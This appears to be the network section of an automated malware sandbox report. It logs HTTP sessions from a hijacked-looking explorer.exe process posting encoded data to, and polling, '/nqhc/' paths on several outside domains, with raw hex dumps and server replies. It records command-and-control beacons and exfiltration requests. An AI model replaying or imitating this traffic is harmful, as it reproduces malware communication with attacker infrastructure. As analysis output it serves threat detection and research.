JbxEL3pFe4j1rVIwZutC6KKMcA5PGsf743_cywZZU2h~rQrqlqOjFDHi2uezk2w0T8ejeHiJyh88keJV0NulXIR7mXv7R68Gl246kaFy3Clf8M3VB5wqWAkWXuuzsQSpwxLOe7AdCJ-0Dx3FdHNsa1zpnBEKUy4SzW19vH7zHB5QUiH~fgzfWflgKjxxLlW6i42VXoF0mp2UHp6wOflIVpX0FYxk1bLXF~NVj(cX_oc32WwUr1VLb6OGOdvD4oxYHTWKYFEZvyC8F9gcVhh0ol_OlGZT1uy62TzUM4rWuA-KNm43qgCXlfN8RaztLThpXWA806o6NdwRTFX6WgzNMAoXACI~emCUDojGSeL3XyK97UD4-RxrsOJQABWuhabl37ZsLvnGin10LlrcvD9GW8IQ4A14Z1PeG76aSy8uDw5XodYaepbhfCMk_~nmDVE~AqqXNgXp60Ukwhxy1bdMnRjvw3uH_Kb(JRadaGh9nCHlA4nTJ5cA-zkTe6HqNSU4kF1f2p_E3vwRdFws37lmxXDmyDH7a(e0F7Vl5t5PS1GrD8m9QUwoun5IE4ID3KprR7TDq(UGIo-0WIqWKXVKwII89Dw924G~qA32QfCzRzra2dUkWYgGErwC_C5j8HNAWQjU-M6ONR_m-2JAiit0NU1zazbvsvczn6Hw7u1(mm_M_tMJvbmcrBA5uVs0Amxip~fSFtZ74PHomX4ueC2un(F1A4PvYQwD8xEBA8Xu_K4OPAOSPbwBi2-qp6mYa(i1QSqbJhxECDtsIJgVSVcm5sYxkXhGy4FrxF2fOzpInUV0zl6B-DF5DMV9lFJnsu0QnkCAc1It2syNGDQUcFm~sJ1UYswHrnHwSEf1lundys3siJI136-YBAx0hneHUGow7kRzXCFEjfsnYyZlwCAh7vb(epivaRIP5Mxf3(rJTtUS9ulw3l0~O6i(bOPGgg4Rwry9ixOLqOIu1pRl6CBUlJIUbgDIn7TI60FFjY9Yh~lOAIy42xSzRGpzExiUhKWmUg-XE6es8kHlYOLHP8cKF6TDXIRwu9xg_aKVoPFOsZdXUabi-HhLQTvcLFTDCDc95vXc9vTGt(zDHblvl0E5Xs2a0INHu94tAe788xTrBW35HsNBaU5AgPc8ybio8K62UYqUzuspuObO4qXGOe9omjektJpyvDEvFDCTnodEQoM(sLT87Z-3C4aMoO6yxauhiZP8fLiengjGcZIcLxGAU5GUaCbf-u0~9tTzrY6pIVygsDSINzH8Y0MxL0R70Ao2Qzdo0eSEDfgA7z0LtHZS5q93N1lA7duty8RuzEmTqCMfcYdiAdzUVfUhgpFWTbLeE(sz_FfQo0qwYpvb3Yi0ruRepdiUnTIWjgD9DxwrtdgoiwSEeCK5EDZME7ST7jJ0lGOD6fr3yUP4YTjblSQ~XuVzyq4m3mOk0Cxy-4YNV52yD7N9tpIWRjxifUYR-LFSv5cy7MnTOWErUkTXHHqR14XJFFxsntdMI2NgHBpr3(cj73-zUMDCd9-I_Tza7cIkXlpdwUQHziDwgbDykjIl6N72KTEp66UfyLO(z7BPhoy(-(1OCWGQwGZx6PPXaA1(WmHmZPR3SDDg75xVRlbJYQLNEnKgjwHQrlZF2iAeLoUQ6Hww0ViI1buMT9NDCP_MouFBrts801JRT7nzjY5sPoAJArqBZ(o6nbjKqdto31XSVi7LpQFNW(uzk3UlSHUrDIakW4v84kSSqvzXXBDDdvwDVCAIwB9A5A-C4Oye6sAiHdJVb4TZVVLHP5cYHAOX-HHrb9gj72gHUQbQViOuQKF1dg3T_65x5jDtmvQSYBUz5h71V3kV68ZCfk1cwjfGtizaicl93Mw0aK6Rm1CmKz9cLXaQqRayxY7GJQDYt9cGHlbjS3HB5JZuWNyRQgWuzwTLzxrLjrkjqvygNjuUnDSbUHV9yNbn64O54fBHHEkJAfx8pXdIdkGXLPnrZNHO_fZw3zRnYEBNA~yOJVTtVFd(mfFH3oHgZA1rRZnbw4tKvqi0ntrukBtg7xauViwo2KhzS8R5EbrOYKlIymKdcbcvp8COnthCgo3T72p3ynLRoieD3AOueRqDok7tiMj9ujvzGltXRbGGcOgx5Ghr5(MaMTL6JKoiTvhAHBwRm2dhvY95fLa2n3inPW69foYRQP-QIt_LMCi2Dlr2GQmbwPm~NFm9NOt9QwcgbXnSdOK18CIeo
                                                                                                                                                                                    Nov 21, 2022 19:24:05.414644957 CET1724OUTData Raw: 72 58 73 64 32 32 64 28 6f 35 48 57 71 42 6c 36 63 79 50 4c 47 6e 31 45 55 63 7a 39 5f 4e 57 57 70 4d 76 74 5f 30 68 63 47 6f 45 4e 62 71 71 74 59 5a 5f 61 5a 28 52 53 6b 79 7a 62 6b 42 6d 6d 33 6d 67 57 65 31 7a 63 6c 36 51 50 59 61 30 42 6b 65
                                                                                                                                                                                    Data Ascii: rXsd22d(o5HWqBl6cyPLGn1EUcz9_NWWpMvt_0hcGoENbqqtYZ_aZ(RSkyzbkBmm3mgWe1zcl6QPYa0BkeV8VMqP5jgYApgpl4DRKGlhnM9jIJTRudcUpj_F-TjzZIIAkI35Ljgo9qESsNHfh6041fKFpo0zjOBUxCjiYd_6-ri3MFDiUkEiCpYouEJMFb6fNtfye8PqKFtrWkSMa4U5Zxhta0FLuFjwgOE7APsL-lAy153xAMk
                                                                                                                                                                                    Nov 21, 2022 19:24:05.414724112 CET1725OUTData Raw: 50 36 6e 38 6a 42 74 6b 31 49 46 6e 78 66 42 77 68 4c 38 57 61 49 70 6e 50 44 79 6c 4e 30 4b 70 46 4a 64 72 44 78 57 30 4c 58 58 52 73 6f 6f 43 38 73 33 62 69 52 72 62 54 47 51 48 4b 4a 50 59 79 77 79 61 41 36 38 7a 6a 65 76 4d 58 30 6b 34 5f 33
                                                                                                                                                                                    Data Ascii: P6n8jBtk1IFnxfBwhL8WaIpnPDylN0KpFJdrDxW0LXXRsooC8s3biRrbTGQHKJPYywyaA68zjevMX0k4_3l0N1IMZXfuix5d2(dQGWRcRvAqW0IAcRGZGfA~h0_mWbEZQJBpb07Sg7qw1ndeRJ5SekGeBdXQ8NbU-DYRECciLLeNba00Gi5R8UYzsjyoVzVpBWLSStRPC2ZPf~VncmKXjl3om0FsjIt6KzJ6aayU_i8OkBzz7jK
                                                                                                                                                                                    Nov 21, 2022 19:24:05.531436920 CET1728OUTData Raw: 36 4f 59 4b 57 32 6c 59 2d 76 50 42 2d 38 76 79 71 46 75 28 6c 50 38 28 5a 74 70 45 6e 7a 74 4a 53 35 46 6c 56 7a 73 78 49 71 4f 65 49 32 36 69 34 46 67 38 50 77 7a 77 6c 6f 6f 48 4b 38 46 74 48 30 71 4f 59 76 7a 72 44 77 74 31 6c 77 31 46 67 59
                                                                                                                                                                                    Data Ascii: 6OYKW2lY-vPB-8vyqFu(lP8(ZtpEnztJS5FlVzsxIqOeI26i4Fg8PwzwlooHK8FtH0qOYvzrDwt1lw1FgYh~RkFKyWjWVtbar53SLTWgsl5fUmWOS~pVSJC5yXj~z9m(5sHZXhB8M8vnV6JlTvGx343Oll3hidVSUikl9jyrENFo3ZFbJ6vj0Munk23rw6YPzMG40(QuKR7AgJUJYkMEFExMpvpujrI4-gtypeax-Tcx047Sc~Z
                                                                                                                                                                                    Nov 21, 2022 19:24:05.531593084 CET1736OUTData Raw: 43 61 59 51 68 70 4f 28 54 32 74 56 51 56 61 6e 4b 33 48 6f 78 68 59 66 62 34 74 5a 78 69 4f 61 56 43 6f 68 6b 51 79 56 2d 51 5f 46 61 37 79 57 6f 55 4d 54 6c 51 4c 4d 61 65 6e 54 35 72 57 32 42 48 64 7e 69 67 34 33 47 67 49 4d 37 52 42 34 46 62
                                                                                                                                                                                    Data Ascii: CaYQhpO(T2tVQVanK3HoxhYfb4tZxiOaVCohkQyV-Q_Fa7yWoUMTlQLMaenT5rW2BHd~ig43GgIM7RB4FbeWbo7ZXim~_a8O6JdFevwt-0YLB5gHBbM51mvAJ4KFV9mqVbbjcTUdv6bXJi2pRzt8yDz9boeKQ2DgLccGFjnGt~AxcwuMju6VEjnh8Cu9QrSW_~cVnLGz-pjvrgluitrNcNi3iTExT9GMwIOfiNLzufmpHQrrRRt
                                                                                                                                                                                    Nov 21, 2022 19:24:05.531759977 CET1738OUTData Raw: 35 5a 63 52 35 32 71 6a 33 76 69 4f 49 79 76 58 6f 56 6b 50 4a 28 4b 66 65 54 47 67 55 68 6e 75 57 52 6c 7e 39 73 6a 6a 6a 69 66 50 70 4f 4a 46 74 28 4c 61 4f 38 4e 49 54 65 4c 48 62 72 4a 58 61 72 33 58 57 33 37 79 55 43 48 78 42 55 35 48 50 6f
                                                                                                                                                                                    Data Ascii: 5ZcR52qj3viOIyvXoVkPJ(KfeTGgUhnuWRl~9sjjjifPpOJFt(LaO8NITeLHbrJXar3XW37yUCHxBU5HPosNb0dG39x5QFDuz4kJ4Jla0AFR4(MlT85yrGiLRZIXvvagm6PgS6FjXe43ReSEfFuGhOoPnHZLw(8lODtP4tlOeuLkJoU~nfHy3VrPpYDOcgjfx28~gE7Jel_PdD3brmqxeHmEE9SxpshIpUAHiDkgj9i438Wuymd
                                                                                                                                                                                    Nov 21, 2022 19:24:05.531944036 CET1751OUTData Raw: 38 56 66 47 79 33 38 7e 48 72 71 31 67 55 6b 55 79 6b 4a 55 48 4a 78 6a 72 42 73 4f 52 57 48 65 70 4f 59 4f 62 6a 49 34 41 31 4e 35 45 47 59 67 63 55 5a 6b 6a 28 5f 65 37 74 37 4e 44 51 33 44 38 73 53 41 54 68 47 48 53 38 6a 59 54 57 4c 76 5f 41
                                                                                                                                                                                    Data Ascii: 8VfGy38~Hrq1gUkUykJUHJxjrBsORWHepOYObjI4A1N5EGYgcUZkj(_e7t7NDQ3D8sSAThGHS8jYTWLv_AdY_xgSIDq(R8X85u-OIx2R68zmj0ZJjD8zDgrpTpJ9oCFDlNBKbcmhpcALcXoJl9JkxE0070CYXkctf4x8cJh2MN1IoX6bsl3Lehsmu2xVvVY0yqpvmNZNtMQX2Nizvyp3zkgFxqmyyJW4Lv9grI8WA73H_y8XhaT
                                                                                                                                                                                    Nov 21, 2022 19:24:05.652458906 CET1754OUTData Raw: 64 57 6b 4f 34 6a 44 35 49 77 42 33 6c 32 54 71 49 51 46 66 43 56 64 6a 43 66 46 61 31 4e 49 7e 78 59 36 4e 56 42 65 32 38 4c 54 4e 70 44 4b 7a 53 4f 74 52 6b 4c 76 51 44 54 77 62 79 38 52 33 4c 64 6b 6b 62 65 69 50 78 28 68 48 50 76 75 54 59 63
                                                                                                                                                                                    Data Ascii: dWkO4jD5IwB3l2TqIQFfCVdjCfFa1NI~xY6NVBe28LTNpDKzSOtRkLvQDTwby8R3LdkkbeiPx(hHPvuTYcqmtcMW58ppTX3mdAavYFi2_~oSqDZ4dM2LuVyorx96pi6jM5HAcJJzmhxTnHO(TPU(bWQMBDxjBG1oy5VLhf3OEOqY_OeWXzyM7QmOdyc30occgxZ01YAvPXkCYFe1hZ29q7KFjcQupsSObyll6fZlJ0C~gMlP23_
                                                                                                                                                                                    Nov 21, 2022 19:24:05.652627945 CET1763OUTData Raw: 62 33 58 44 78 33 4c 35 59 38 45 79 46 36 34 61 6f 73 6d 66 75 62 5f 6c 6d 70 46 58 2d 56 36 66 36 35 46 4e 75 79 4d 6b 6c 70 55 4d 39 44 44 38 4e 34 61 76 69 6f 7a 53 52 59 35 46 32 52 78 73 70 30 55 62 44 35 62 61 69 45 42 64 65 41 41 42 72 74
                                                                                                                                                                                    Data Ascii: b3XDx3L5Y8EyF64aosmfub_lmpFX-V6f65FNuyMklpUM9DD8N4aviozSRY5F2Rxsp0UbD5baiEBdeAABrt6UldsQCtcPqr6UB0ZLY1TuOw41E8hY8BrMysvjLG3c-Iqe-peJezWdVCULwUrW2rA7ucx0ZSopkRJtrl9cJzeYjdinn3mywyU(g6sZGKfAT4Z7WXuJzG-ROaylGNs04B8OV7YgUf7(e~Bnpn2n-jgm9pTNmEZhIJQ
                                                                                                                                                                                    Nov 21, 2022 19:24:05.652790070 CET1765OUTData Raw: 6e 78 58 37 37 30 6c 52 4a 34 48 32 43 74 30 42 47 45 68 50 64 63 57 68 47 77 43 56 4a 6d 71 6b 39 52 79 35 33 38 56 69 33 44 57 49 32 65 65 76 30 69 44 32 62 53 6f 35 77 76 52 58 58 74 31 42 71 75 5a 48 57 71 43 65 63 33 39 35 30 4e 58 50 4b 78
                                                                                                                                                                                    Data Ascii: nxX770lRJ4H2Ct0BGEhPdcWhGwCVJmqk9Ry538Vi3DWI2eev0iD2bSo5wvRXXt1BquZHWqCec3950NXPKxNI8phhthVK3WquCPPFhVSbQzEG-VZKYBa(zCi5q5X(q92s-HPu0bDWI~UOcaoNMbSpJMA75K7zMVhL9wBiQ6znFKZk5TVPXM1zVpzQH8fgg7Dy3bA5jRSICI2t1wQHREEYH5Ct6jTTexal-3wnDO94lJW8lUZ40RR
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931422949 CET1767INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:05 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                    Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                                                    X-nginx-cache: WordPress
                                                                                                                                                                                    Content-Length: 13045
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a a2 5f 3b 55 77 6f da 22 67 7a ba 57 af 5e bd fa 4f be 7d 7d fe f6 1f 3f bf 20 a9 c9 f8 70 77 b7 6f 7f 49 cc d4 c0 e1 46 39 84 53 91 0c 1c 10 ee 2f 17 ce ee 4e ae 60 c4 ae 07 8e 4c 7a 58 60 72 dd f3 7d 99 e4 5e 06 be d0 4f 1d 82 00 3b fd 14 68 3c dc dd 21 64 a7 9f 81 a1 24 4a a9 d2 60 06 ce 2f 6f bf 73 4f 9c e5 27 41 33 18 38 63 06 93 5c 2a e3 90 48 0a 03 02 53 27 2c 36 e9 20 86 31 8b c0 2d 2f 75 dd ee ce 4e ff 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b d2 f1 5a de b1 17 10 97 50 26 35 48 2f 92 19 71 dd a1 4d 5f ea a4 64 28 8d 5e ea 23 24 13 31 5c 3b c4 bf 9b 9a 80 00 45 8d 54 4b d9 77 9a ee 3f fb f1 35 fe 1e cc bb cf 60 74 a4 58 6e 88 99 e6 08 44 f3 9c b3 88 1a 26 85 cf e3 c3 f7 5a 0a 84 e4 54 6b 7c 2b c9 ba 3a 4a 21 a3 76 c2 9d 9d 1b e7 3f ca 7e d7 c6 e9 39 95 c6 ef fc 77 7e 95 e2 49 95 38 0d e7 3f 12 45 f3 d4 e9 fd 86 c9 b6 09 66 3e 57 a8 7a a4 8a 2c 7c c9 b4 b1 39 2c 5e 01 50 72 4a b9 81 28 4d b8 0c 29 b7 02 bd f3 c5 1f 69 f4 ce 7f 1a ce 8b 79 55 cc 0c 64 16 e7 05 87 0c 27 5f e9 64 e3 3f e2 fb b6 3d 9e f2 45 41 2e 35 b3 42 38 bd a0 6a e2 f4 16 c0 bf 42 f8 33 4d 60 5b 5c cc b3 9b c2 c4 1f 64 66 ab 0a c5 b7 a8 ba c5 32 14 b7 24 b4 ad 3e f3 09 6e 1b 1f af c3 5d ac 65 35 5a 9f ac 46 85 be d0 e4 27 69 c8 77 b2 10 f1 b6 c2 d4 00 28 4f ae 60 cc 64 a1 b7 93 68 49 9c df 97 e5 79 ad 12 2a d8 9f a5 ef b7 b6 8a 5c 2d aa 67 79 63 73 c9 5b 4c 26 df 97 d9 5b 2f bb e1 70 99 c8 65 59 7f cc 50 d4 d7 e1 7b 88 cc b6 28 93 dc 8d a4 30 20 cc 3b bf c8 b9 a4 b1 7e e7 b7 9a ad d6 3b 3f 08 de f9 91 92 79 0e b1 fb 12 3b bd a2 57 ca 0d bc 5c 24 1f 35 b2 85 c0 c2 09 8b 4d 8a a6 e8 34 1b 4e 0a 2c 49 8d d3 eb b4 71 33 cc 92 2f a7 f9 38 e8 db e5 05 7d 94 c1 9e 4e 20 cc ab aa 0f 71 15 52 17 2f a9 48 8a 92 bf 03 c2 fd e5 c2 06 f5 cf 54 99 d7 a3 ed 47 c2 f6 9a 19 b0 36 0d 15 d0 38 52 45 16 6e 5d 5e cf b0 a8 b4 de bd a7 ca 85 6d b0 ed fa 66 84 b6 77 e4 06 53 af 15 29 2f 2c cd 14 d4 c7 2d 1e c7 fb fd 76 77 67 a7 ef eb 48 b1 dc 0c ed f9 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b e2 ba c3 dd dd dd ea e9 6d ca 34 b1 63 11 fc 95 b9 61 19 fb 13 62 32 61 26 25 26 05 f2 0f 49 b5 29 ab 72 5e 24 08 32 0e 4e bd a0 49 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03
                                                                                                                                                                                    Data Ascii: rksg1\- "c+;OR&0`bto$_;Uwo"gzW^O}}? pwoIF9S/N`LzX`r}^O;h<!d$J`/osO'A38c\*HS',6 1-/uNg&kkZP&5H/qM_d(^#$1\;ETKw?5`tXnD&ZTk|+:J!v?~9w~I8?Ef>Wz,|9,^PrJ(M)iyUd'_d?=EA.5B8jB3M`[\df2$>n]e5ZF'iw(O`dhIy*\-gycs[L&[/peYP{(0 ;~;?y;W\$5M4N,Iq3/8}N qR/HTG68REn]^mfwS)/,-vwgHg&kkm4cab2a&%&I)r^$2NI\R1lTq@kvCkC"!#YQiL,P+2#H
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931551933 CET1768INData Raw: c2 0c 50 b9 4b 54 8e f8 eb d3 4b a4 a5 ec c7 bb 3f 08 65 25 ba 2c f7 b9 80 7b a8 ba 52 9f 58 9b 0d 1c 9a e7 9c 45 e5 7e 7c 1e 1f be d7 b8 27 12 71 aa f5 c0 29 a5 73 75 94 42 46 dd 44 d1 3c 75 86 b8 f8 b2 c1 b5 99 6f df f7 ab 14 0f 97 6d dd 5a 65
                                                                                                                                                                                    Data Ascii: PKTK?e%,{RXE~|'q)suBFD<uomZe~{:<MC5^dUQ,@f~h8LNx!,0ho!95oFTvb"t(@M]&.CS~s{a%IF.zy%W+6lcmre~=DV
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931607008 CET1769INData Raw: ef 07 bd 7d cc 30 86 46 69 99 b4 ef 48 51 3f 1f d8 de ab 2f 25 3b 6d a8 81 28 a5 22 01 a7 b1 44 de 89 64 96 73 30 e0 0c 06 03 5a 4d 72 61 73 ed 62 ee ce 75 70 d0 d8 07 2b bf 2c 54 04 ff fb bf 37 b7 07 5e 24 45 84 e9 d6 ba df 44 48 6b e9 7e d0 03
                                                                                                                                                                                    Data Ascii: }0FiHQ?/%;m("Dds0ZMrasbup+,T7^$EDHk~oLo{n'LreTd8A{uKg}_Gffi#.vu8L!7;19a30g;T1SH&]J&iz9"]
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931660891 CET1770INData Raw: 2c 70 7b 0c 52 1e 97 90 b6 2c ab 78 e3 20 e8 bb 69 af f6 40 59 f6 c8 2a 32 66 dc b0 40 96 62 59 cc 96 55 73 86 f6 28 8c 82 3f 0a a6 20 76 ad d3 d6 92 98 db e9 2c a7 71 cc 44 b2 f0 78 29 72 d3 6b 6f 5e 97 14 17 96 ab d6 0c 89 a6 c0 92 d4 94 10 1f
                                                                                                                                                                                    Data Ascii: ,p{R,x i@Y*2f@bYUs(? v,qDx)rko^iSD3(2,5=*E4gr&*P.a#Qc)Dq@b})99CD@{jTujCb6S=-9gHrzH`Auvu*B6BDB=t6vtM/8()
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931714058 CET1772INData Raw: d7 3e d9 90 72 82 29 5d af 79 64 53 6e 7b 93 14 14 ec 7b 4c a3 10 53 59 18 77 c4 e1 fa e0 26 a1 b9 1d a8 6b 73 42 19 4f c9 4a 86 9c 90 21 f1 28 67 89 e0 30 32 37 18 a1 68 61 7b 3e cb 50 4f 26 5c 26 38 c3 b5 6b 43 15 be 34 ef 84 41 c4 38 ca a3 e0
                                                                                                                                                                                    Data Ascii: >r)]ydSn{{LSYw&ksBOJ!(g027ha{>PO&\&8kC4A8%Hk4@P7ue#0<aY.bl~~$6"IWj]/.Xmf!];aI{dLNrrpr28ppl`+Z6p}3GN{~\f =R
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931766033 CET1773INData Raw: ca ca 1f 3e a2 87 17 9c 86 87 af 45 75 e7 85 a2 75 31 5e 85 91 c2 fe aa 28 65 a8 91 d1 87 df d2 02 9d 0d 6a 16 1d 4b cc 0e ca 56 81 6d d5 3a 6f 95 97 56 75 69 97 97 76 75 59 62 d4 3a ef 96 97 6e 75 39 2a 2f 47 d5 e5 b8 bc 1c 57 97 93 f2 72 52 5d
                                                                                                                                                                                    Data Ascii: >Euu1^(ejKVm:oVuivuYb:nu9*/GWrR]Ni=b\sKT[AP~NjD~i`Z3m0Xi?;T{F24~_PY<H@i{BSR.e/"rS^s)b0+Ja{?13_9HS->B%ic
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931818008 CET1774INData Raw: 5a ef 91 0c 62 46 07 7b 94 f3 3d e2 0f 77 fb 9c 89 2b 82 3b 19 ec 69 74 3a e8 14 c0 ec 11 16 0f f6 c6 13 37 a6 ea ca 0d b9 8c ae dc f2 d5 2d 21 52 05 a3 c1 5e 6a 4c de f3 7d 25 a7 94 1b 88 d2 84 cb 90 72 2f 92 99 3f c9 dd 48 0a 03 c2 f8 26 85 0c
                                                                                                                                                                                    Data Ascii: ZbF{=w+;it:7-!R^jL}%r/?H&_cTk02KX/@7=R%`"W;,w|CRm3/Y(J,z8Bp7&&?DG@*bwrTs9pvK)rk Jmd2x4
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931870937 CET1776INData Raw: e3 a3 ee e7 f7 b7 77 8c b8 9d e3 66 b7 ec d3 c6 8e ad 15 0e 4b 38 cf 36 e0 04 75 47 7f 8d 3a 73 c9 d0 34 40 98 68 0d 9c 0b 59 a8 08 be 57 34 4f 59 e4 10 99 83 a2 46 aa 81 c3 44 0d 53 8a 87 87 ca 32 d6 d6 c3 3e 7e 91 eb 8c 0b ec 97 1a 93 f7 7c 7f
                                                                                                                                                                                    Data Ascii: wfK86uG:s4@hYW4OYFDS2>~|2x'UM3<VC&,6iiX8QgD^Lqfs#rpPK^8#FGSgDA"jj23!*UbFlNmmi+;`
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931924105 CET1777INData Raw: f7 7c 5f c9 29 e5 06 a2 34 e1 32 a4 dc 8b 64 e6 0c 7f 90 19 f4 7d 8a 3b e0 6c b8 bb 86 d6 d1 e3 b4 72 a9 cd a5 3d dd 67 96 d3 64 39 8a 68 5b f1 f2 69 28 0b e3 16 da 77 86 cf ec 91 fc a2 37 b2 3c fe ac 2c 8f b7 64 19 49 61 68 54 f3 3c af 2e 8f 31
                                                                                                                                                                                    Data Ascii: |_)42d};lr=gd9h[i(w7<,dIahT<.1=LOd1h</H^|#2WlL)VpMJ"?WsX/8c63OTG7,oGA22:!AH!O.c.mtbD5Q4}636r\E"c6{h
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931978941 CET1778INData Raw: 3b b6 60 ff 59 f0 e9 a7 43 1d 55 50 02 3e 1d aa 6b a1 5e d1 cf 40 aa 53 8a 95 2b c6 3f 1d ab 5d b1 42 87 df c5 42 d7 f6 7d 5d fa 19 2f 7d 1d 29 96 1b 62 a6 39 1a dd c0 b5 f1 df d3 31 ad a2 ce 70 d7 ff 1b e9 3f f9 ed fc db 67 6f 9f fd 46 fe e6 ef
                                                                                                                                                                                    Data Ascii: ;`YCUP>k^@S+?]BB}]/})b91p?goFYr3J2 0/8>q,6CvwfxDyJEyATs@'#^`lMC;Jl`B~}hCK1K0
                                                                                                                                                                                    Nov 21, 2022 19:24:06.047044992 CET1779INData Raw: 2e 9f e5 67 a1 db 74 86 b8 83 52 f0 99 de 93 c9 c4 1b 4f d0 14 19 e8 52 ec ea e8 8f 14 80 1b 53 75 e5 4e a4 8a 73 05 5a bb e5 93 4f 0c 55 09 98 c1 de 65 c8 a9 b8 da 1b 7e 8b 59 e4 57 cc fa d9 66 91 b7 36 ab 54 ff f9 94 fc fd d7 f2 8a db c8 ef 73
                                                                                                                                                                                    Data Ascii: .gtRORSuNsZOUe~YWf6Tstq(6&#r)*%'.-s|\@hk;c| {X,;._~eGdrC4%cZE"LT.v1Q7>SE\P2 7f~Q


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    67192.168.11.2049893192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:07.554896116 CET1780OUTGET /nqhc/?r4txB=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.royaltechglobal.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:24:07.793509960 CET1780INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:07 GMT
                                                                                                                                                                                    Server: nginx/1.21.6
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                    X-Redirect-By: WordPress
                                                                                                                                                                                    Location: http://royaltechglobal.com/nqhc/?r4txB=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&1b=S8jD
                                                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                                                    X-nginx-cache: WordPress
                                                                                                                                                                                    X-Server-Cache: true
                                                                                                                                                                                    X-Proxy-Cache: MISS


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    68192.168.11.204989438.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:22.974842072 CET1781OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.xiaoxiuzhen.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.xiaoxiuzhen.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.xiaoxiuzhen.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 41 6b 61 4d 58 5f 51 6b 64 4c 66 56 66 61 4d 5f 6d 5a 4f 34 66 74 76 48 31 61 4f 4e 47 2d 55 4e 30 75 54 36 48 42 64 55 46 73 56 41 5a 72 46 4b 71 72 49 34 49 46 38 58 6b 56 71 49 44 53 6f 37 48 59 66 6d 76 6c 53 46 63 62 37 6c 66 7a 36 4c 4c 6a 4c 4e 7e 50 69 45 77 6f 67 37 30 34 5a 51 47 53 75 6c 4a 4f 5a 5f 47 33 41 6e 39 7a 78 65 63 33 34 76 69 56 75 78 43 30 5a 65 35 71 37 57 52 72 44 33 31 4d 6b 59 73 56 30 46 6e 77 75 55 63 75 54 48 35 37 42 54 73 5a 4a 36 6a 6e 6e 59 6a 61 34 5a 65 32 42 37 6b 64 47 49 7e 49 71 63 59 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=AkaMX_QkdLfVfaM_mZO4ftvH1aONG-UN0uT6HBdUFsVAZrFKqrI4IF8XkVqIDSo7HYfmvlSFcb7lfz6LLjLN~PiEwog704ZQGSulJOZ_G3An9zxec34viVuxC0Ze5q7WRrD31MkYsV0FnwuUcuTH57BTsZJ6jnnYja4Ze2B7kdGI~IqcYQ).
                                                                                                                                                                                    Nov 21, 2022 19:24:23.177141905 CET1782INHTTP/1.1 400 Bad Request
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:23 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Transfer-Encoding: chunked
